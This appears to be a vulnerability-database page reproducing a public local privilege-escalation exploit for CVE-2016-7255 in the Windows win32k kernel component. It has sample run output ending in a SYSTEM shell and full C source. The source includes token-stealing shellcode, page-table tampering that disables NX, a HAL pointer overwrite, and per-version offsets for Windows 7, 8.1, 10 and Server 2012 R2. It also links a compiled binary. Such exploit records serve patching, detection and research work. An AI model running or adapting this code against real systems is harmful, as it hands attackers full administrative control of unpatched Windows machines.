[+] Spurious PT: fffff67b3d9e0000
[+] Content pml4e fffff67b3d9ecff8: 99f063
[+] Patching the Spurious Offset with 99f067
[+] Content pdpte fffff67b3d9ffff8: 9a0063
[+] Patching the Spurious Offset with 9a0067
[+] Content pdpte fffff67b3ffffff0: 821063
[+] Patching the Spurious Offset with 821067
[+] Content pte fffff67fffffe800: 1967
[+] Patching the Spurious Offset with 1967
Original HalpIntteruptRequest pointer: fffff80150e1fc40
[+] Selected spurious PML4E: fffff67b3d9ecf08
[+] Spurious PT: fffff67b3d9e1000
[+] Content pml4e fffff67b3d9ecff8: 99f063
[+] Patching the Spurious Offset with 99f067
[+] Content pdpte fffff67b3d9ffff8: 9a0063
[+] Patching the Spurious Offset with 9a0067
[+] Content pdpte fffff67b3ffffff0: 821063
[+] Patching the Spurious Offset with 821067
[+] Content pte fffff67fffffe800: 1967
*** Patching the original location to enable NX...
[+] Patching the Spurious Offset with 1967
HAL address: fffff67b3d9e1000
[+] w00t: Shellcode stored at: ffffffffffd00d50
[+] Selected spurious PML4E: fffff67b3d9ecf10
[+] Spurious PT: fffff67b3d9e2000
[+] Content pml4e fffff67b3d9ecff8: 99f063
[+] Patching the Spurious Offset with 99f067
[+] Content pdpte fffff67b3d9ffff8: 9a0063
[+] Patching the Spurious Offset with 9a0067
[+] Content pdpte fffff67b3ffffff0: 821063
[+] Patching the Spurious Offset with 821067
[+] Content pte fffff67fffffe800: 1967
[+] Patching the Spurious Offset with 1967
Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\qa\Desktop>
C:\Users\qa\Desktop>whoami
nt authority\system

C:\Users\qa\Desktop>
Exploit Database EDB-ID : 41015

Publication date : 2017-01-07 23h00 +00:00
Author : Rick Larabee
EDB Verified : No

/*
Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html
Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe
Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41015.exe
*/

// ricklarabee.blogspot.com
//This program is free software; you can redistribute it and/or
//modify it under the terms of the GNU General Public License
//as published by the Free Software Foundation.

//This program is distributed in the hope that it will be useful,
//but WITHOUT ANY WARRANTY; without even the implied warranty of
//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
//GNU General Public License for more details.

//You should have received a copy of the GNU General Public License
//along with this program; if not, write to the Free Software
//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

// Credits: [email protected]: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255
// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255

#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>

#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib, "advapi32")

UINT64 PML4_BASE;
UINT PML4_SELF_REF_INDEX;
UINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define GET_INDEX(va) ( ((va >> 39) & 0x1ff ))

////////////////////////////////////////////////////////
// Define Data Types
////////////////////////////////////////////////////////
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    PVOID Unknown1;
    PVOID Unknown2;
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength);
typedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

NtQuerySystemInformation_t NtQuerySystemInformation;
NtQueryIntervalProfile_t NtQueryIntervalProfile;

char shellcode[] = {
    //0xcc,
    0xfa,                                                           // CLI
    0x9c,                                                           // PUSHFQ
    0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,     // MOV RAX, Original Pointer
    0x50,                                                           // PUSH RAX
    0x51,                                                           // PUSH RCX
    0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,     // MOV RCX, [OverwriteAddr+OverwriteOffset]
    0x48, 0x89, 0x01,                                               // MOV QWORD PTR [RCX], RAX
    0xb9, 0x90, 0x90, 0x90, 0x90,                                   // MOV ECX, PID
    0x53,                                                           // PUSH RBX
    0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,           // MOV RAX,QWORD PTR gs:0x188
    0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,                       // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS
    0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,                       // LEA RAX,[RAX+0xActiveProcessLinkOffset]
    //<tag>
    0x48, 0x8b, 0x00,                                               // MOV RAX,QWORD PTR [RAX]
    0x48, 0x8b, 0x58, 0xf8,                                         // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
    0x48, 0x83, 0xfb, 0x04,                                         // CMP RBX,0x4
    0x75, 0xf3,                                                     // JNE <tag>
    0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,                       // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM
    0x53,                                                           // PUSH RBX
    //<tag2>
    0x48, 0x8b, 0x00,                                               // MOV RAX,QWORD PTR [RAX]
    0x48, 0x8b, 0x58, 0xf8,                                         // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
    0x39, 0xcb,                                                     // CMP EBX, ECX // our PID
    0x75, 0xf5,                                                     // JNE <tag2>
    0x5b,                                                           // POP RBX
    0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,                       // MOV QWORD PTR[RAX + 0x60], RBX
    0x5b,                                                           // POP RBX
    0x59,                                                           // POP RCX
    0x58,                                                           // POP RAX
    0x9d,                                                           // POPFQ
    0xfb,                                                           // STI
    0xff, 0xe0                                                      // JMP RAX
};

// User-mode stand-in for the kernel DbgPrint: formats into a heap buffer and hands it to the debugger.
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
    CHAR* pszDbgBuff = NULL;
    va_list VaList = NULL;
    ULONG ulRet = 0;

    do
    {
        pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));
        if (NULL == pszDbgBuff)
        {
            break;
        }
        RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));

        va_start(VaList, Format);
        _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);
        OutputDebugStringA(pszDbgBuff);
        va_end(VaList);
    } while (FALSE);

    if (NULL != pszDbgBuff)
    {
        HeapFree(GetProcessHeap(), 0, pszDbgBuff);
        pszDbgBuff = NULL;
    }

    return ulRet;
}

// Synthesised keyboard input helpers (SendInput) used to drive the window switching below.
int _sim_key_down(WORD wKey)
{
    INPUT stInput = { 0 };

    do
    {
        stInput.type = INPUT_KEYBOARD;
        stInput.ki.wVk = wKey;
        stInput.ki.dwFlags = 0;
        SendInput(1, &stInput, sizeof(stInput));
    } while (FALSE);

    return 0;
}

int _sim_key_up(WORD wKey)
{
    INPUT stInput = { 0 };

    do
    {
        stInput.type = INPUT_KEYBOARD;
        stInput.ki.wVk = wKey;
        stInput.ki.dwFlags = KEYEVENTF_KEYUP;
        SendInput(1, &stInput, sizeof(stInput));
    } while (FALSE);

    return 0;
}

int _sim_alt_shift_esc()
{
    int i = 0;

    do
    {
        _sim_key_down(VK_MENU);
        _sim_key_down(VK_SHIFT);

        _sim_key_down(VK_ESCAPE);
        _sim_key_up(VK_ESCAPE);

        _sim_key_down(VK_ESCAPE);
        _sim_key_up(VK_ESCAPE);

        _sim_key_up(VK_MENU);
        _sim_key_up(VK_SHIFT);
    } while (FALSE);

    return 0;
}

int _sim_alt_shift_tab(int nCount)
{
    int i = 0;
    HWND hWnd = NULL;
    int nFinalRet = -1;

    do
    {
        _sim_key_down(VK_MENU);
        _sim_key_down(VK_SHIFT);

        for (i = 0; i < nCount; i++)
        {
            _sim_key_down(VK_TAB);
            _sim_key_up(VK_TAB);
            Sleep(1000);
        }

        _sim_key_up(VK_MENU);
        _sim_key_up(VK_SHIFT);
    } while (FALSE);

    return nFinalRet;
}

int _sim_alt_esc(int count)
{
    int i = 0;

    for (i = 0; i<count; i++)
    {
        _sim_key_down(VK_MENU);
        //_sim_key_down(VK_SHIFT);

        _sim_key_down(VK_ESCAPE);
        _sim_key_up(VK_ESCAPE);

        _sim_key_down(VK_ESCAPE);
        _sim_key_up(VK_ESCAPE);

        _sim_key_up(VK_MENU);
        //_sim_key_up(VK_SHIFT);
    }

    return 0;
}

// Triggers the win32k bug: the window's GWLP_ID is pointed near pAddress and window switching
// makes the kernel OR a flag into the value at that location. Loops until the PML4 self-ref
// entry reads as a valid present entry (low bits 0x67).
int or_address_value_4(__in void* pAddress)
{
    WNDCLASSEXW stWC = { 0 };
    HWND hWndParent = NULL;
    HWND hWndChild = NULL;
    WCHAR* pszClassName = L"cve-2016-7255";
    WCHAR* pszTitleName = L"cve-2016-7255";
    void* pId = NULL;
    MSG stMsg = { 0 };
    UINT64 value = 0;

    do
    {
        stWC.cbSize = sizeof(stWC);
        stWC.lpfnWndProc = DefWindowProcW;
        stWC.lpszClassName = pszClassName;

        if (0 == RegisterClassExW(&stWC))
        {
            break;
        }

        hWndParent = CreateWindowExW(
            0,
            pszClassName,
            NULL,
            WS_OVERLAPPEDWINDOW | WS_VISIBLE,
            0, 0, 360, 360,
            NULL,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );
        if (NULL == hWndParent)
        {
            break;
        }

        hWndChild = CreateWindowExW(
            0,
            pszClassName,
            pszTitleName,
            WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,
            0, 0, 160, 160,
            hWndParent,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );
        if (NULL == hWndChild)
        {
            break;
        }

#ifdef _WIN64
        pId = ((UCHAR*)pAddress - 0x28);
#else
        pId = ((UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64

        SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);

        DbgPrint("hWndChild = 0x%p\n", hWndChild);

        ShowWindow(hWndParent, SW_SHOWNORMAL);

        SetParent(hWndChild, GetDesktopWindow());
        SetForegroundWindow(hWndChild);

        _sim_alt_shift_tab(4);
        SwitchToThisWindow(hWndChild, TRUE);
        _sim_alt_shift_esc();

        while (GetMessage(&stMsg, NULL, 0, 0))
        {
            SetFocus(hWndParent);
            _sim_alt_esc(20);
            SetFocus(hWndChild);
            _sim_alt_esc(20);

            TranslateMessage(&stMsg);
            DispatchMessage(&stMsg);

            if (value != 0)
            {
                break;
            }

            __try
            {
                value = *(UINT64 *)PML4_SELF_REF;
                if ((value & 0x67) == 0x67)
                {
                    printf("Value Self Ref = %llx\n", value);
                    break;
                }
            }
            __except (EXCEPTION_EXECUTE_HANDLER)
            {
                continue;
            }
        }
    } while (FALSE);

    if (NULL != hWndParent)
    {
        DestroyWindow(hWndParent);
        hWndParent = NULL;
    }

    if (NULL != hWndChild)
    {
        DestroyWindow(hWndChild);
        hWndChild = NULL;
    }

    UnregisterClassW(pszClassName, GetModuleHandleW(NULL));

    return 0;
}

// Returns the virtual address of the paging-structure entry that maps `address`,
// using the self-referencing PML4 slot (PML4_SELF_REF_INDEX): VA >> 9, with the top
// bits replaced by the self-ref region base and the result 8-byte aligned.
UINT64 get_pxe_address(UINT64 address)
{
    UINT entry = PML4_SELF_REF_INDEX;
    UINT64 result = address >> 9;
    UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);
    UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;
    result = result | lower_boundary;
    result = result & upper_boundary;
    return result;
}

UINT64 look_free_entry_pml4(void)
{
    // Looks for a free pml4e in the last 0x100 bytes of the PML4
    int offset = 0xF00;
    UINT64 pml4_search = PML4_BASE + offset;

    while (offset < 0xFF8)
    {
        if ((*(PVOID *)pml4_search) == 0x0)
        {
            // This is a NULL (free) entry
            break;
        }
        offset += 8;
        pml4_search = PML4_BASE + offset;
    }

    return pml4_search;
}

// Virtual address of the page table that a PML4 slot at `spurious_offset` would map through
// the self-ref region (PML4 -> PDPT -> PD all at the self-ref index, PT index = slot number).
UINT64 calculate_spurious_pt_address(UINT64 spurious_offset)
{
    UINT64 index = (spurious_offset & 0xFFF) / 8;
    UINT64 result = (
        ((UINT64)0xFFFF << 48) |
        ((UINT64)PML4_SELF_REF_INDEX << 39) |
        ((UINT64)PML4_SELF_REF_INDEX << 30) |
        ((UINT64)PML4_SELF_REF_INDEX << 21) |
        (index << 12)
    );
    return result;
}

UINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original)
{
    /*
    1: kd> !pte ffffffff`ffd00000
                                               VA ffffffffffd00000
    PXE at FFFFF6FB7DBEDFF8    PPE at FFFFF6FB7DBFFFF8    PDE at FFFFF6FB7FFFFFF0    PTE at FFFFF6FFFFFFE800
    contains 0000000000A1F063  contains 0000000000A20063  contains 0000000000A25063  contains 8000000000103963
    pfn a1f       ---DA--KWEV  pfn a20       ---DA--KWEV  pfn a25       ---DA--KWEV  pfn 103       -G-DA--KW-V
    */

    UINT64 pte = get_pxe_address(virtual_address);
    int pte_offset = pte & 0xFFF;
    //printf("PTE: %llx, %x\n", pte, pte_offset);

    UINT64 pde = get_pxe_address(pte);
    int pde_offset = pde & 0xFFF;
    //printf("PDE: %llx, %x\n", pde, pde_offset);

    UINT64 pdpte = get_pxe_address(pde);
    int pdpte_offset = pdpte & 0xFFF;
    //printf("PDPTE: %llx,%x\n", pdpte, pdpte_offset);

    UINT64 pml4e = get_pxe_address(pdpte);
    int pml4e_offset = pml4e & 0xFFF;
    //printf("PML4E: %llx\n", pml4e, pml4e_offset);

    UINT64 spurious_offset = look_free_entry_pml4();
    printf("[+] Selected spurious PML4E: %llx\n", spurious_offset);

    UINT64 f_e_pml4 = spurious_offset;

    UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);
    printf("[+] Spurious PT: %llx\n", spurious_pt);
    printf("--------------------------------------------------\n\n");

    //Read the physical address of pml4e
    UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);
printf("[+] Content pml4e %llx: %llx\n", pml4e, pml4e_pfn); // Change the PxE pml4e_pfn = pml4e_pfn | 0x67; // Set U/S printf("[+] Patching the Spurious Offset (PML4e) %llx: %llx\n",f_e_pml4, pml4e_pfn); *((PVOID *)spurious_offset) = (PVOID)pml4e_pfn; Sleep(0x1); // Sleep for TLB refresh; //Read the physical address of pdpte UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset); printf("[+] Content pdpte %llx: %llx\n", pdpte, pdpte_pfn); // Change the PxE pdpte_pfn = pdpte_pfn | 0x67; // Set U/S printf("[+] Patching the Spurious Offset (PDPTE) %llx: %llx\n", spurious_offset, pdpte_pfn); *((PVOID *)spurious_offset) = (PVOID)pdpte_pfn; Sleep(0x1); // Sleep for TLB refresh; //Read the physical address of pde UINT64 pde_addr = spurious_pt + pde_offset; UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset); printf("[+] Content pdpe %llx: %llx\n", pde, pde_pfn); // Change the PxE pde_pfn = pde_pfn | 0x67; // Set U/S printf("[+] Patching the Spurious Offset (PDE) %llx: %llx\n", spurious_offset, pde_pfn); *((PVOID *)spurious_offset) = (PVOID)pde_pfn; Sleep(0x1); // Sleep for TLB refresh; //Read the physical address of pte UINT64 pte_addr = spurious_pt + pte_offset; UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset); printf("[+] Content pte %llx: %llx\n", pte, pte_pfn); // Change the PxE pte_pfn = pte_pfn | 0x67; // Set U/S pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX if (patch_original) { printf("*** Patching the original location to enable NX...\n"); *(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn; } printf("[+] Patching the Spurious Offset (PTE) %llx: %llx\n", spurious_offset, pte_pfn); *((PVOID *)spurious_offset) = (PVOID)pte_pfn; Sleep(0x1); // Sleep for TLB refresh; printf("\n\n"); return spurious_pt; } UINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) { printf("[*] Getting Overwrite pointer: %llx\n", target_address); UINT64 OverwriteAddress = 
create_spurious_pte_to_virtual_address(target_address, FALSE); OverwriteAddress += (target_address & 0xFFF); printf("OverwriteAddress: %llx\n", OverwriteAddress); return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset)); } void overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) { UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE); OverwriteTarget += (target_address & 0xFFF); UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset; printf("Patch OverwriteTarget: %llx with %llx\n", target, hook_address); *(PVOID *)target = (PVOID)hook_address; } UINT64 store_shellcode_in_hal(void) { //// Finally store the shellcode on the HAL UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000; UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE); printf("HAL address: %llx\n", hal_heap); // 0xffffffffffd00d50 this is a good offset to store shellcode // 0xfff - 0xd50 = 0x2af space memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode)); return 0xffffffffffd00d50; } UINT64 GetHalDispatchTable() { PCHAR KernelImage; SIZE_T ReturnLength; HMODULE hNtDll = NULL; UINT64 HalDispatchTable; HMODULE hKernelInUserMode = NULL; PVOID KernelBaseAddressInKernelMode; NTSTATUS NtStatus = STATUS_UNSUCCESSFUL; PSYSTEM_MODULE_INFORMATION pSystemModuleInformation; hNtDll = LoadLibrary("ntdll.dll"); if (!hNtDll) { printf("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); // Allocate the Heap chunk pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength); if 
(!pSystemModuleInformation) { printf("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtStatus = NtQuerySystemInformation(SystemModuleInformation, pSystemModuleInformation, ReturnLength, &ReturnLength); if (NtStatus != STATUS_SUCCESS) { printf("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base; KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1; printf("\t\t\t[+] Loaded Kernel: %s\n", KernelImage); printf("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode); hKernelInUserMode = LoadLibraryA(KernelImage); if (!hKernelInUserMode) { printf("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } // This is still in user mode HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, "HalDispatchTable"); if (!HalDispatchTable) { printf("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } else { HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode; // Here we get the address of HapDispatchTable in Kernel mode HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode); printf("\t\t\t[+] HalDispatchTable: 0x%llx\n", HalDispatchTable); } HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); if (hNtDll) { FreeLibrary(hNtDll); } if (hKernelInUserMode) { FreeLibrary(hKernelInUserMode); } hNtDll = NULL; hKernelInUserMode = NULL; pSystemModuleInformation = NULL; return HalDispatchTable; } int __cdecl main(int argc, char** argv) { TCHAR pre_username[256]; TCHAR post_username[256]; DWORD size = 256; ULONG Interval = 0; HMODULE hNtDll = NULL; UINT retval; UINT64 overwrite_address; int overwrite_offset; // define operating system version specific variables unsigned char sc_KPROCESS; unsigned int sc_TOKEN; 
unsigned int sc_APLINKS; int osversion; if (argc != 2) { printf("Please enter an OS version\n"); printf("The following OS'es are supported:\n"); printf("\t[*] 7 - Windows 7\n"); printf("\t[*] 81 - Windows 8.1\n"); printf("\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\n"); printf("\t[*] 12 - Windows 2012 R2\n"); printf("\n"); printf("\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\n"); return -1; } osversion = _strtoui64(argv[1], NULL, 10); if(osversion == 7) { // the target machine's OS is Windows 7 SP1 printf(" [+] Windows 7 SP1\n"); sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80) sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY overwrite_address = GetHalDispatchTable(); // HalDispatchTable overwrite_offset = 0x8; // QueryIntervalProfile } else if(osversion == 81) { // the target machine's OS is Windows 8.1 printf(" [+] Windows 8.1\n"); sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)) overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) } else if(osversion == 10) { // the target machine's OS is Windows 10 prior to build 14393 printf(" [+] Windows 10\n"); sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60) sc_APLINKS = 0x2f0; // dt -r1 
nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) } else if(osversion == 12) { // the target machine's OS is Windows 2012 R2 printf(" [+] Windows 2012 R2\n"); sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) } // in case the OS version is not any of the previously checked versions else { printf(" [-] Unsupported version\n"); printf(" [*] Affected 64-bit operating systems\n"); printf(" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\n"); printf(" [*] Windows 8.1 -- cve-2016-7255.exe 81\n"); printf(" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\n"); printf(" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\n"); return -1; } printf("My PID is: %d\n", GetCurrentProcessId()); GetUserName(pre_username, &size); printf("Current Username: %s\n", pre_username); printf("PML4 Self Ref: %llx\n", PML4_SELF_REF); printf("Shellcode stored at: %p\n", (void *) &shellcode); printf("Enter to continue...\n"); getchar(); do { or_address_value_4((void*)PML4_SELF_REF); } while (FALSE); PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF); printf("[*] Self Ref Index: %x\n", PML4_SELF_REF_INDEX); PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000); UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset); printf("Original OverwriteTarget pointer: %llx\n", original_pointer); DWORD pid 
= GetCurrentProcessId(); /* Shellcode Patching !! */ char *p = shellcode; p += 4; // skip the CLI, PUSHF and MOV RAX bytes *(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1 p += 12; // Patch shellcode with original value in the Overwrite address *(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset); p += 12; // To patch the PID of our process *(DWORD *)p = (DWORD)pid; p += 17; *(unsigned char *)p = (unsigned char)sc_KPROCESS; p += 7; *(unsigned int *)p = (unsigned int)sc_APLINKS; p += 20; *(unsigned int *)p = (unsigned int)sc_TOKEN; p += 20; *(unsigned int *)p = (unsigned int)sc_TOKEN; UINT64 shellcode_va = store_shellcode_in_hal(); printf("[+] w00t: Shellcode stored at: %llx\n", shellcode_va); overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset); if (osversion == 7){ // Exploit Win7.1 hNtDll = LoadLibrary("ntdll.dll"); if (!hNtDll) { printf("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtQueryIntervalProfile(0x1337, &Interval); } while (1) { size = 256; GetUserName(post_username, &size); if (memcmp(post_username, pre_username, 256) != 0) break; } Sleep(2000); system("cmd.exe"); return 0; }

Products Mentioned

Configuration 0

Microsoft>>Windows_10_1507 >> Version -

Microsoft>>Windows_10_1511 >> Version -

Microsoft>>Windows_10_1607 >> Version -

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_8.1 >> Version -

Microsoft>>Windows_rt_8.1 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_server_2012 >> Version -

Microsoft>>Windows_server_2012 >> Version r2

Microsoft>>Windows_server_2016 >> Version -

Microsoft>>Windows_vista >> Version -

References

https://www.exploit-db.com/exploits/40823/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/41015/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/40745/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id/1037251
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/94064
Tags : vdb-entry, x_refsource_BID